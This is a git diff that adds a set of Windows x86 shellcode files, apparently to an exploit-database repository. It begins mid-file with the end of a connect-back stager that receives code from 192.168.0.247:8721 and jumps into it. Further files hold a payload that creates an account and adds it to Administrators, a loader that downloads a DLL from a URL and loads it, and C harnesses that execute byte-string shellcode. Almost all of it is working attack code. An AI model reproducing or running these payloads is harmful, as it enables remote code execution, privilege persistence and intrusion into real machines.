+    mov ebx, [edx + 36]                     
+    add ebx, ebp
+    mov cx, [ebx + 2 * ecx]         
+    mov ebx, [edx + 28]                     
+    add ebx, ebp
+    mov eax, [ebx + 4 * ecx]        
+    add eax, ebp
+    jmp short LFinderDone
+
+%ifdef NICE
+LNotFound:
+    xor eax, eax
+%endif 
+
+LFinderDone:
+    call LoadDBMSSOCN
+
+LDataSegment:
+;========================
+db "DBMSSOCN.DLL"
+db 0x00, 0xFF               ; second byte only added for easy disasm
+;========================
+
+LoadDBMSSOCN:                         
+	call eax                ; LoadLibraryA (ptr to dll on stack)
+    mov esi, eax            ; esi used by all DBMSSOCN functions
+    ESIMOD                  ; inc base to save space on the calls
+    xor edi, edi            ; edi is just a null
+    
+LWSAStartup:
+    sub sp, 400
+	push esp
+	push dword 0x101
+	call DBMSSOCN_WSAStartup
+
+LSocket:
+	push edi
+	push edi
+	push edi
+	push edi
+	inc edi
+	push edi
+	inc edi
+	push edi
+	call DBMSSOCN_socket
+	mov ebx, eax
+
+LConnect:
+    push 0xF700A8C0         ; host: 192.168.0.247
+    push 0x11220002         ; port: 8721     
+	mov ecx, esp
+	push byte 0x10
+	push ecx
+	push ebx
+	call DBMSSOCN_connect   ; set eax to 0 on success
+
+%ifdef NICE
+    test eax,eax
+    jnz LConnect
+    xor eax, eax
+%endif 
+        
+LReadCodeFromSocket:
+    add di, 0xffe            ; read 4096 bytes of payload (edi == 2)
+    sub esp, edi
+    mov ebp, esp
+    push eax               ; flags
+    push edi               ; length
+    push ebp               ; buffer
+    push ebx               ; socket
+    call DBMSSOCN_recv     ; recv(socket, buffer, length, flags)
+    jmp esp                ; jump into new payload
\ No newline at end of file
diff --git a/shellcodes/windows_x86/43761.asm b/shellcodes/windows_x86/43761.asm
new file mode 100644
index 000000000..81e857a00
--- /dev/null
+++ b/shellcodes/windows_x86/43761.asm
@@ -0,0 +1,200 @@
+;      Title:  Win32Create Admin User Account
+;  Platforms:  Windows NT 4.0, Windows 2000, Windows XP
+;   Function:  NetUserAdd(X);  NetLocalGroupAddMembers(X, Administrators);
+;     Author:  hdm[at]metasploit.com
+
+
+[BITS 32]
+
+global _start
+
+_start:
+
+	sub sp, 128
+    
+	mov esi, esp
+
+	;	[esi]
+	;	    00 kernel32.dll
+	;		04 netapi32.dll
+	;		08 LoadLibraryA
+	;		12 ExitProcess
+	;		16 NetUserAdd
+	;		20 NetLocalGroupAddMembers
+	;		24 user/pass
+	;		28 group
+	
+
+    ; get base kernel32 address
+	call LK32Base
+	mov [esi], eax
+    mov ebx, eax
+    
+	; GetProcAddress(ExitProcess)
+	push ebx
+	push 0x73e2d87e
+	call LGetProcAddress
+	mov [esi + 12], eax
+    
+    ; GetProcAddress(LoadLibraryA)
+    push ebx
+	push 0xec0e4e8e
+	call LGetProcAddress
+	mov [esi + 8], eax
+
+	; LoadLibrary(netapi32.dll)
+	xor ebx, ebx
+	push	ebx
+	push	0x32336970
+	push	0x6174656e
+	push	esp
+	call	eax
+	mov [esi + 4], eax
+    mov ebx, eax
+
+	; GetProcAddress(NetUserAdd)
+	push ebx
+	push 0xcd7cdf5e
+	call LGetProcAddress
+	mov [esi + 16], eax
+
+	; GetProcAddress(NetLocalGroupAddMembers)
+	push ebx
+	push  0xc30c3dd7
+	call LGetProcAddress
+	mov [esi + 20], eax
+
+    ; useful register values
+	xor eax, eax
+	xor ebx, ebx
+	inc ebx
+	
+    ; push the group (Administrators)
+	push eax
+	push 0x00730072
+	push 0x006f0074
+	push 0x00610072
+	push 0x00740073
+	push 0x0069006e
+	push 0x0069006d
+	push 0x00640041
+	mov [esi + 28], esp
+
+	; push the username (X)
+	push eax
+	push 0x00000058
+	mov	 ecx, esp
+	mov [esi + 24], ecx 
+
+    ; add the \ to the username
+	push 0x005c0000
+
+    ; create the NetUserAdd arguments
+	push eax
+	push ebx
+	push eax
+	push eax
+	push ebx
+	push eax
+	push ecx
+	push ecx
+	mov ecx, esp 
+
+	push eax
+	push esp	
+	push ecx	
+	push ebx	
+	push eax
+    
+    ; call NetUserAdd(X)
+	call [esi + 16]
+
+    ; create the NetLocalGroupAddMembers arguments
+	mov ecx, [esi + 24]
+	dec ecx
+	dec ecx
+	push ecx
+	mov ecx, esp
+
+	push byte 1	
+	push ecx			
+	push byte 3	
+	push dword [esi + 28]		
+	push byte 0
+    
+    ; call NetLocalGroupAddMembers
+	call [esi + 20]
+
+LFinished:
+	
+	call [esi + 12]
+
+LK32Base:
+	push esi
+    push byte 0x30
+    pop ecx
+	mov eax, [fs:ecx]
+	mov eax, [eax + 0x0c] 
+	mov esi, [eax + 0x1c] 
+	lodsd				  
+	mov eax, [eax + 0x08] 
+	pop esi
+	ret 4
+    
+LGetProcAddress:
+	
+	push ebx
+	push ebp
+	push esi
+	push edi
+	mov ebp, [esp + 24]			
+	mov eax, [ebp + 0x3c]		
+	mov edx, [ebp + eax + 120]
+	add edx, ebp				
+	mov ecx, [edx + 24]			
+	mov ebx, [edx + 32]
+	add ebx, ebp
+
+LFnlp:
+
+	jecxz	LNtfnd
+	dec ecx
+	mov esi, [ebx + ecx * 4]
+	add esi, ebp				
+	xor edi, edi	
+	cld
+
+LHshlp:
+
+	xor eax, eax
+	lodsb
+	cmp al, ah
+	je LFnd
+	ror edi, 13
+	add edi, eax
+	jmp short LHshlp
+
+LFnd:
+	
+	cmp edi, [esp + 20]
+	jnz LFnlp
+	mov ebx, [edx + 36]			
+	add ebx, ebp
+	mov cx, [ebx + 2 * ecx]		
+	mov ebx, [edx + 28]			
+	add ebx, ebp
+	mov eax, [ebx + 4 * ecx]	
+	add eax, ebp
+	jmp short LDone
+
+LNtfnd:
+
+	xor eax, eax
+
+LDone:
+	mov edx, ebp
+	pop edi
+	pop esi
+	pop ebp
+	pop ebx
+	ret 8
\ No newline at end of file
diff --git a/shellcodes/windows_x86/43762.c b/shellcodes/windows_x86/43762.c
new file mode 100644
index 000000000..a21ac58fa
--- /dev/null
+++ b/shellcodes/windows_x86/43762.c
@@ -0,0 +1,22 @@
+/*
+win32/xp sp3 (FR) Sleep 14 bytes
+Author : optix hacker <aidi youssef>
+Mail : optix@9.cn
+notice Tested Under Windows XP SP3 (fr)
+this shellcode makes a sleep for 90000ms=90s=1,5min
+this is API from kernel32.dll for sleep :0x7C802446 in win32 xp sp3 (fr)
+assembly code is secret in this shellcode :)
+
+*/
+#include <stdio.h>
+unsigned char shellcode[] ="\x31"
+
+"\xC0\xB9\x46\x24\x80\x7C\x66\xB8\x90\x5F\x50\xFF\xD1";
+int main ()
+{
+int *ret;
+ret=(int *)&ret+2;
+printf("Shellcode Length is : %d\n",strlen(shellcode));
+(*ret)=(int)shellcode;
+return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86/43763.txt b/shellcodes/windows_x86/43763.txt
new file mode 100644
index 000000000..321bd20f9
--- /dev/null
+++ b/shellcodes/windows_x86/43763.txt
@@ -0,0 +1,71 @@
++-------------------------------------------------+
+
+| Windows XP Pro Sp2 English "Wordpad" Shellcode. |
+
++-------------------------------------------------+
+
+
+Size  : 15 Bytes.
+Author: Aodrulez. 
+Email : f3arm3d3ar@gmail.com
+
+
+Shellcode = "\x6A\x05\x68\x97\x4C\x80\x7C\xB8"
+            "\x4D\x11\x86\x7C\xFF\xD0\xCC";
+
+
++-----------+
+
+| Asm Code: |
+
++-----------+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+start:
+      push 5
+	push 7c804c97h    ;addr of "write" string in mem
+	mov eax,7c86114dh ;addr of "WinExec" Function.
+	call eax
+	int 3h
+end start
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+
++-----------------+
+
+| Shellcodetest.c |
+
++-----------------+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+char code[] = "\x6A\x05\x68\x97\x4C"
+              "\x80\x7C\xB8\x4D\x11"
+              "\x86\x7C\xFF\xD0\xCC";
+
+
+int main(int argc, char **argv)
+{
+  int (*func)();
+  func = (int (*)()) code;
+  (int)(*func)();
+}
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
++-------------------+
+
+| Greetz Fly Out To |
+
++-------------------+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+1] Amforked()	 : My Mentor.
+2] The Blue Genius : My Boss.
+3] www.orchidseven.com
+4] www.isacm.org.in
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\ No newline at end of file
diff --git a/shellcodes/windows_x86/43764.c b/shellcodes/windows_x86/43764.c
new file mode 100644
index 000000000..c976c5766
--- /dev/null
+++ b/shellcodes/windows_x86/43764.c
@@ -0,0 +1,45 @@
+/*
+
+[+] win32/xp pro sp3 (calc) 57 bytes
+
+
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0     _                   __           __       __                     1
+1   /' \            __  /'__`\        /\ \__  /'__`\                   0
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+1                  \ \____/ >> Exploit database separated by exploit   0
+0                   \/___/          type (local, remote, DoS, etc.)    1
+1                                                                      1
+0  [+] Site            : Inj3ct0r.com                                  0
+1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
+0                                                                      0
+1                    ######################################            1
+0                    I'm cr4wl3r  member from Inj3ct0r Team            1
+1                    ######################################            0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+
+
+
+[+]Discovered By: cr4wl3r
+ */
+
+#include <stdio.h>
+#include <string.h>
+
+ 
+int main() {
+char shell[] = 	"\xb8\xff\xef\xff\xff\xf7\xd0\x2b\xe0\x55\x8b\xec"
+		"\x33\xff\x57\x83\xec\x04\xc6\x45\xf8\x63\xc6\x45"
+		"\xf9\x6d\xc6\x45\xfa\x64\xc6\x45\xfb\x2e\xc6\x45"
+		"\xfc\x65\xc6\x45\xfd\x78\xc6\x45\xfe\x65\x8d\x45"
+		"\xf8\x50\xbb\xc7\x93\xbf\x77\xff\xd3";
+
+printf("Shellcode lenght %d\n", strlen(shell));
+getchar();
+((void (*)()) shell)();
+return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86/43765.c b/shellcodes/windows_x86/43765.c
new file mode 100644
index 000000000..48f704d35
--- /dev/null
+++ b/shellcodes/windows_x86/43765.c
@@ -0,0 +1,26 @@
+/*
+ | Title: Windows Xp Pro SP3 Fr (calc.exe) Shellcode 31 Bytes
+ | Type: Shellcode
+ | Author: agix
+ | Platform: win32
+*/
+
+#include <stdio.h>
+
+char shellcode[] =
+"\xEB\x10" //jmp short 0x12
+"\x5B" //pop ebx
+"\x53" //push ebx
+"\xBB\xAD\x23\x86\x7C" //mov ebx, 0x7c8623ad
+"\xFF\xD3" //call ebx
+"\xBB\xFA\xCA\x81\x7C" //mov ebx, 0x7c81cafa
+"\xFF\xD3" //call ebx
+"\xE8\xEB\xFF\xFF\xFF" //call dword 0x2
+//db calc.exe
+"\x63\x61\x6C\x63\x2E\x65\x78\x65";
+
+int main(int argc, char **argv) {
+        int *ret;
+        ret = (int *)&ret + 2;
+        (*ret) = (int) shellcode;
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86/43766.asm b/shellcodes/windows_x86/43766.asm
new file mode 100644
index 000000000..babdfd2d8
--- /dev/null
+++ b/shellcodes/windows_x86/43766.asm
@@ -0,0 +1,101 @@
+; Copyright (c) 2009-2010, Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
+; Project homepage: http://code.google.com/p/w32-dl-loadlib-shellcode/
+; All rights reserved. See COPYRIGHT.txt for details.
+BITS 32
+; Windows x86 null-free shellcode that writes "Hello, world!" to stdout.
+; Works in any console application for Windows 5.0-7.0 all service packs.
+; (See http://skypher.com/wiki/index.php/Hacking/Shellcode).
+; This version uses 16-bit hashes.
+
+%define url 'http://skypher.com/dll'
+%strlen sizeof_url url
+
+%include 'w32-dl-loadlib-shellcode-hash-list.asm'
+
+%define B2W(b1,b2)                      (((b2) << 8) + (b1))
+%define W2DW(w1,w2)                     (((w2) << 16) + (w1))
+%define B2DW(b1,b2,b3,b4)               (((b4) << 24) + ((b3) << 16) + ((b2) << 8) + (b1))
+
+%define buffer_size 0x7C
+
+%ifdef STACK_ALIGN
+    AND     SP, 0xFFFC
+%endif
+    MOV     EDI, W2DW(hash_kernel32_LoadLibraryA, hash_urlmon_URLDownloadToCacheFileA)
+find_hash: ; Find ntdll's InInitOrder list of modules:
+    PUSH    EDI                         ; Stack = (hash, hash) [, &(url), &(LoadLibraryA)]
+    XOR     ESI, ESI                    ; ESI = 0
+    MOV     ESI, [FS:ESI + 0x30]        ; ESI = &(PEB) ([FS:0x30])
+    MOV     ESI, [ESI + 0x0C]           ; ESI = PEB->Ldr
+    MOV     ESI, [ESI + 0x1C]           ; ESI = PEB->Ldr.InInitOrder (first module)
+next_module: ; Get the baseaddress of the current module and find the next module:
+    MOV     EBP, [ESI + 0x08]           ; EBP = InInitOrder[X].base_address
+    MOV     ESI, [ESI]                  ; ESI = InInitOrder[X].flink == InInitOrder[X+1]
+get_proc_address_loop: ; Find the PE header and export and names tables of the module:
+    MOV     EBX, [EBP + 0x3C]           ; EBX = &(PE header)
+    MOV     EBX, [EBP + EBX + 0x78]     ; EBX = offset(export table)
+    ADD     EBX, EBP                    ; EBX = &(export table)
+    MOV     ECX, [EBX + 0x18]           ; ECX = number of name pointers
+    JCXZ    next_module                 ; No name pointers? Next module.
+next_function_loop: ; Get the next function name for hashing:
+    MOV     EDI, [EBX + 0x20]           ; EDI = offset(names table)
+    ADD     EDI, EBP                    ; EDI = &(names table)
+    MOV     EDI, [EDI + ECX * 4 - 4]    ; EDI = offset(function name)
+    ADD     EDI, EBP                    ; EDI = &(function name)
+    XOR     EAX, EAX                    ; EAX = 0
+    CDQ                                 ; EDX = 0
+hash_loop: ; Hash the function name and compare with requested hash
+    XOR     DL, [EDI]
+    ROR     DX, BYTE hash_ror_value
+    SCASB
+    JNE     hash_loop
+    CMP     DX, [ESP]
+    LOOPNE  next_function_loop          ; Not the right hash and functions left in module? Next function
+    JNE     next_module                 ; Not the right hash and no functions left in module? Next module
+    ; Found the right hash: get the address of the function:
+    MOV     EDX, [EBX + 0x24]           ; ESI = offset ordinals table
+    ADD     EDX, EBP                    ; ESI = &oridinals table
+    MOVZX   EDX, WORD [EDX + 2 * ECX]   ; ESI = ordinal number of function
+    MOV     EDI, [EBX + 0x1C]           ; EDI = offset address table
+    ADD     EDI, EBP                    ; EDI = &address table
+    ADD     EBP, [EDI + 4 * EDX]        ; EBP = &(function)
+    ; Move to the next hash, this sets ECX to 0 if there are no more hashes:
+    POP     CX                          ; CX = hash | Stack = hash [, &(url), &(LoadLibraryA)]
+    POP     CX                          ; CX = hash | Stack = [&(url), &(LoadLibraryA)]
+    MOV     AH, 0x1                     ; EAX = 0x100
+    JCXZ    download_and_loadlibrary    ; No more hashes
+    MOV     EDI, ECX                    ; EDI = hashes
+    SUB     ESP, EAX                    ; Stack = buffer (0x100 bytes)
+    PUSH    AX                          ; Stack = (0, 1), buffer
+    PUSH    B2DW('l', 'm', 'o', 'n')    ; Stack = "lmon", (0, 1), buffer
+    PUSH    WORD B2W('u', 'r')          ; Stack = "urlmon", (0, 1), buffer
+    PUSH    ESP                         ; Stack = &("urlmon"), "urlmon", (0, 1), buffer
+    CALL    EBP                         ; LoadLibraryA("urlmon")
+    PUSH    EBP                         ; Stack = &(LoadLibraryA), buffer
+    CALL    find_hash                   ; Stack = &(url), &(LoadLibraryA), buffer
+    db      url
+download_and_loadlibrary:               ; Stack = &(url), &(LoadLibraryA), buffer
+    POP     ESI                         ; ESI = &(url)          | Stack = &(LoadLibraryA), buffer
+    POP     EDX                         ; EDX = &(LoadLibraryA) | Stack = buffer
+    ; Copy url to stack and NULL terminate it:
+    MOV     EDI, ESP                    ; EDI = &(buffer)
+    PUSH    BYTE sizeof_url             ; 
+    POP     ECX                         ; ECX = sizeof(url)
+    REP     MOVSB                       ; Stack = url buffer     | EDI = &(buffer)
+    STOSB                               ; Stack = url, 0, buffer | EDI = &(buffer)
+    MOV     ESI, ESP                    ; ESI = &(url)
+    ; Create a ret-into-libc stack chain to make URLDownloadToCacheFileA() return to LoadLibraryA():
+                                        ; LoadLibraryA(
+    PUSH    EDI                         ;   __in LPCTSTR lpFileName = &(buffer)
+    PUSH    ECX                         ; ) return address = NULL
+                                        ; URLDownloadToCacheFileA(
+    PUSH    ECX                         ;   __in  IBindStatusCallback *pBSC = NULL
+    PUSH    ECX                         ;         DWORD dwReserved = NULL
+    ; Our buffer is not really 0x100 bytes long anymore because we used part of it to store the URL... oh well.
+    PUSH    EAX                         ;   __in  DWORD cchFileName = sizeof(buffer)
+    PUSH    EDI                         ;   __out LPTSTR szFileName = &(buffer)
+    PUSH    ESI                         ;   __in  LPCSTR szURL = &(url)
+    PUSH    ECX                         ;   __in  LPUNKNOWN lpUnkcaller = NULL
+    PUSH    EDX                         ; ) return address = LoadLibraryA
+    ; Start the ret-into-libc chain:
+    JMP     EBP                         ; Jump to URLDownloadToCacheFileA, then return to LoadLibraryA
\ No newline at end of file
diff --git a/shellcodes/windows_x86/43767.asm b/shellcodes/windows_x86/43767.asm
new file mode 100644
index 000000000..0d42783b2
--- /dev/null
+++ b/shellcodes/windows_x86/43767.asm
@@ -0,0 +1,63 @@
+; Copyright (c) 2009-2010, Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
+; Project homepage: http://code.google.com/p/w32-dl-loadlib-shellcode/
+; All rights reserved. See COPYRIGHT.txt for details.
+BITS 32
+; Windows x86 null-free shellcode that executes calc.exe.
+; Works in any application for Windows 5.0-7.0 all service packs.
+; (See http://skypher.com/wiki/index.php/Hacking/Shellcode).
+; This version uses 16-bit hashes.
+
+%include 'w32-exec-calc-shellcode-hash-list.asm'
+
+%define B2W(b1,b2)                      (((b2) << 8) + (b1))
+%define W2DW(w1,w2)                     (((w2) << 16) + (w1))
+%define B2DW(b1,b2,b3,b4)               (((b4) << 24) + ((b3) << 16) + ((b2) << 8) + (b1))
+
+%ifdef STACK_ALIGN
+    AND     SP, 0xFFFC
+%endif
+find_hash: ; Find ntdll's InInitOrder list of modules:
+    XOR     ESI, ESI                    ; ESI = 0
+    PUSH    ESI                         ; Stack = 0
+    MOV     ESI, [FS:ESI + 0x30]        ; ESI = &(PEB) ([FS:0x30])
+    MOV     ESI, [ESI + 0x0C]           ; ESI = PEB->Ldr
+    MOV     ESI, [ESI + 0x1C]           ; ESI = PEB->Ldr.InInitOrder (first module)
+next_module: ; Get the baseaddress of the current module and find the next module:
+    MOV     EBP, [ESI + 0x08]           ; EBP = InInitOrder[X].base_address
+    MOV     ESI, [ESI]                  ; ESI = InInitOrder[X].flink == InInitOrder[X+1]
+get_proc_address_loop: ; Find the PE header and export and names tables of the module:
+    MOV     EBX, [EBP + 0x3C]           ; EBX = &(PE header)
+    MOV     EBX, [EBP + EBX + 0x78]     ; EBX = offset(export table)
+    ADD     EBX, EBP                    ; EBX = &(export table)
+    MOV     ECX, [EBX + 0x18]           ; ECX = number of name pointers
+    JCXZ    next_module                 ; No name pointers? Next module.
+next_function_loop: ; Get the next function name for hashing:
+    MOV     EDI, [EBX + 0x20]           ; EDI = offset(names table)
+    ADD     EDI, EBP                    ; EDI = &(names table)
+    MOV     EDI, [EDI + ECX * 4 - 4]    ; EDI = offset(function name)
+    ADD     EDI, EBP                    ; EDI = &(function name)
+    XOR     EAX, EAX                    ; EAX = 0
+    CDQ                                 ; EDX = 0
+hash_loop: ; Hash the function name and compare with requested hash
+    XOR     DL, [EDI]
+    ROR     DX, BYTE hash_ror_value
+    SCASB
+    JNE     hash_loop
+    CMP     DX, hash_kernel32_WinExec
+    LOOPNE  next_function_loop          ; Not the right hash and functions left in module? Next function
+    JNE     next_module                 ; Not the right hash and no functions left in module? Next module
+    ; Found the right hash: get the address of the function:
+    MOV     EDX, [EBX + 0x24]           ; ESI = offset ordinals table
+    ADD     EDX, EBP                    ; ESI = &oridinals table
+    MOVZX   EDX, WORD [EDX + 2 * ECX]   ; ESI = ordinal number of function
+    MOV     EDI, [EBX + 0x1C]           ; EDI = offset address table
+    ADD     EDI, EBP                    ; EDI = &address table
+    ADD     EBP, [EDI + 4 * EDX]        ; EBP = &(function)
+    ; create the calc.exe string
+    PUSH    B2DW('.', 'e', 'x', 'e')    ; Stack = ".exe", 0
+    PUSH    B2DW('c', 'a', 'l', 'c')    ; Stack = "calc.exe", 0
+    PUSH    ESP                         ; Stack = &("calc.exe"), "calc.exe", 0
+    XCHG    EAX, [ESP]                  ; Stack = 0, "calc.exe", 0
+    PUSH    EAX                         ; Stack = &("calc.exe"), 0, "calc.exe", 0
+    CALL    EBP                         ; WinExec(&("calc.exe"), 0);
+    INT3                                ; Crash
\ No newline at end of file
diff --git a/shellcodes/windows_x86/43768.asm b/shellcodes/windows_x86/43768.asm
new file mode 100644
index 000000000..d9306b8b5
--- /dev/null
+++ b/shellcodes/windows_x86/43768.asm
@@ -0,0 +1,81 @@
+; Copyright (c) 2009-2010, Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
+; Project homepage: http://code.google.com/p/w32-dl-loadlib-shellcode/
+; All rights reserved. See COPYRIGHT.txt for details.
+BITS 32
+; Windows x86 null-free shellcode that executes calc.exe.
+; Works in any application for Windows 5.0-7.0 all service packs.
+; (See http://skypher.com/wiki/index.php/Hacking/Shellcode).
+; This version uses 16-bit hashes.
+
+%include 'w32-msgbox-shellcode-hash-list.asm'
+
+%define B2W(b1,b2)                      (((b2) << 8) + (b1))
+%define W2DW(w1,w2)                     (((w2) << 16) + (w1))
+%define B2DW(b1,b2,b3,b4)               (((b4) << 24) + ((b3) << 16) + ((b2) << 8) + (b1))
+
+%ifdef STACK_ALIGN
+    AND     SP, 0xFFFC
+%endif
+find_hash: ; Find ntdll's InInitOrder list of modules:
+    XOR     ESI, ESI                    ; ESI = 0
+    PUSH    ESI                         ; Stack = 0
+    MOV     ESI, [FS:ESI + 0x30]        ; ESI = &(PEB) ([FS:0x30])
+    MOV     ESI, [ESI + 0x0C]           ; ESI = PEB->Ldr
+    MOV     ESI, [ESI + 0x1C]           ; ESI = PEB->Ldr.InInitOrder (first module)
+next_module: ; Get the baseaddress of the current module and find the next module:
+    MOV     EBP, [ESI + 0x08]           ; EBP = InInitOrder[X].base_address
+    MOV     ESI, [ESI]                  ; ESI = InInitOrder[X].flink == InInitOrder[X+1]
+get_proc_address_loop: ; Find the PE header and export and names tables of the module:
+    MOV     EBX, [EBP + 0x3C]           ; EBX = &(PE header)
+    MOV     EBX, [EBP + EBX + 0x78]     ; EBX = offset(export table)
+    ADD     EBX, EBP                    ; EBX = &(export table)
+    MOV     ECX, [EBX + 0x18]           ; ECX = number of name pointers
+    JCXZ    next_module                 ; No name pointers? Next module.
+next_function_loop: ; Get the next function name for hashing:
+    MOV     EDI, [EBX + 0x20]           ; EDI = offset(names table)
+    ADD     EDI, EBP                    ; EDI = &(names table)
+    MOV     EDI, [EDI + ECX * 4 - 4]    ; EDI = offset(function name)
+    ADD     EDI, EBP                    ; EDI = &(function name)
+    XOR     EAX, EAX                    ; EAX = 0
+    CDQ                                 ; EDX = 0
+hash_loop: ; Hash the function name and compare with requested hash
+    XOR     DL, [EDI]
+    ROR     DX, BYTE hash_ror_value
+    SCASB
+    JNE     hash_loop
+    CMP     DX, hash_user32_MessageBoxA
+    JE      found_MessageBoxA           ;
+    CMP     DX, hash_kernel32_LoadLibraryA
+    LOOPNE  next_function_loop          ; Not the right hash and functions left in module? Next function
+    JNE     next_module                 ; Not the right hash and no functions left in module? Next module
+found_MessageBoxA:
+    ; Found the right hash: get the address of the function:
+    MOV     EDX, [EBX + 0x24]           ; EDX = offset ordinals table
+    ADD     EDX, EBP                    ; EDX = &oridinals table
+    MOVZX   EDX, WORD [EDX + 2 * ECX]   ; EDX = ordinal number of function
+    MOV     EDI, [EBX + 0x1C]           ; EDI = offset address table
+    ADD     EDI, EBP                    ; EDI = &address table
+    ADD     EBP, [EDI + 4 * EDX]        ; EBP = &(function)
+    TEST    ESI, ESI
+    JZ      show_MesageBoxA
+    PUSH    B2DW('3', '2', ' ', ' ')    ; Stack = "er32", 0
+    PUSH    B2DW('u', 's', 'e', 'r')    ; Stack = "  user32", 0
+    PUSH    ESP                         ; Stack = &("  user32"), "  user32", 0
+    CALL    EBP                         ; LoadLibraryA(&("  user32"));
+    XCHG    EAX, EBP                    ; EBP = &(user32.dll)
+    XOR     ESI, ESI                    ; ESI = 0
+    PUSH    ESI                         ; Stack = 0, "  user32", 0
+    JMP     get_proc_address_loop
+
+show_MesageBoxA:
+    ; create the "Hello world!" string
+    PUSH    B2DW('r', 'l', 'd', '!')    ; Stack = "rld!", 0, "  user32", 0
+    PUSH    B2DW('o', ' ', 'w', 'o')    ; Stack = "o world!", 0, "  user32", 0
+    PUSH    B2DW('H', 'e', 'l', 'l')    ; Stack = "Hello world!", 0, "  user32", 0
+    PUSH    ESP                         ; Stack = &("Hello world!"), "Hello world!", 0, "  user32", 0
+    XCHG    EAX, [ESP]                  ; Stack = 0, "Hello world!", 0, "  user32", 0
+    PUSH    EAX                         ; Stack = &("Hello world!"), 0, "Hello world!", 0, "  user32", 0
+    PUSH    EAX                         ; Stack = &("Hello world!"), &("Hello world!"), 0, "Hello world!", 0, "  user32", 0
+    PUSH    ESI                         ; Stack = 0, &("Hello world!"), &("Hello world!"), 0, "Hello world!", 0, "  user32", 0
+    CALL    EBP                         ; MessageBoxA(NULL, &("Hello world!"), &("Hello world!"), MB_OK);
+    INT3                                ; Crash
\ No newline at end of file
diff --git a/shellcodes/windows_x86/43769.c b/shellcodes/windows_x86/43769.c
new file mode 100644
index 000000000..dfa97ec3e
--- /dev/null
+++ b/shellcodes/windows_x86/43769.c
@@ -0,0 +1,32 @@
+# Title    : win32/xp sp3 (Tr) MessageBoxA Shellcode 109 bytes
+# Proof    : http://img443.imageshack.us/img443/7900/proofaz.jpg
+# Author   : ZoRLu
+# mail-msn : admin@yildirimordulari.com
+# Home     : z0rlu.blogspot.com
+# Date     : 14/09/2010
+# Tesekkur : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
+# Temenni  : Yeni Anayasamiz Hayirli Olsun
+# Lakirdi  : I dont know very well assembly. but, I know I will learn its too :P
+
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+ 
+int main(){
+    
+    unsigned char shellcode[]=
+    "\x31\xc0\x31\xdb\x31\xd9\x31\xd2\xeb\x35\x59\x88\x51\x0a\xbb\x7b\x1d"
+    "\x80\x7c\x51\xff\xd3\xeb\x37\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x30"
+    "\xae\x80\x7c\xff\xd3\xeb\x37\x59\x31\xd2\x88\x51\x07\x52\x52\x51\x52"
+    "\xff\xd0\x31\xd2\x50\xb8\xfa\xca\x81\x7c\xff\xd0\xe8\xc6\xff\xff\xff"
+    "\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc4\xff\xff\xff\x4d"
+    "\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc4\xff\xff\xff\x69"
+    "\x74\x73\x20\x6f\x6b\x21\xff";
+ 
+    printf("Size = %d bytes\n", strlen(shellcode));
+ 
+    ((void (*)())shellcode)();
+ 
+    return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/windows_x86/43770.c b/shellcodes/windows_x86/43770.c
new file mode 100644
index 000000000..2be717b18
--- /dev/null
+++ b/shellcodes/windows_x86/43770.c
@@ -0,0 +1,29 @@
+# Title        : win32/xp sp3 (Tr) calc.exe Shellcode 53 bytes
+# Proof        : http://img178.imageshack.us/img178/548/proofxw.jpg
+# Author       : ZoRLu / http://inj3ct0r.com/author/577
+# mail-msn     : admin@yildirimordulari.com
+# Home         : http://z0rlu.blogspot.com
+# Date         : 15/09/2010
+# Tesekkur     : inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N
+# Temenni      : Yeni Anayasamiz Hayirli Olsun
+# Lakirdi      : I dont know very well assembly. but, I know I will learn its too :P
+
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+ 
+int main(){
+    
+    unsigned char shellcode[]=
+    "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x13\x53\xbb\xad\x23\x86\x7c"
+    "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
+    "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x63\x61\x6c\x63\x2e\x65"
+    "\x78\x65";
+ 
+    printf("Size = %d bytes\n", strlen(shellcode));
+ 
+    ((void (*)())shellcode)();
+ 
+    return 0;
+}
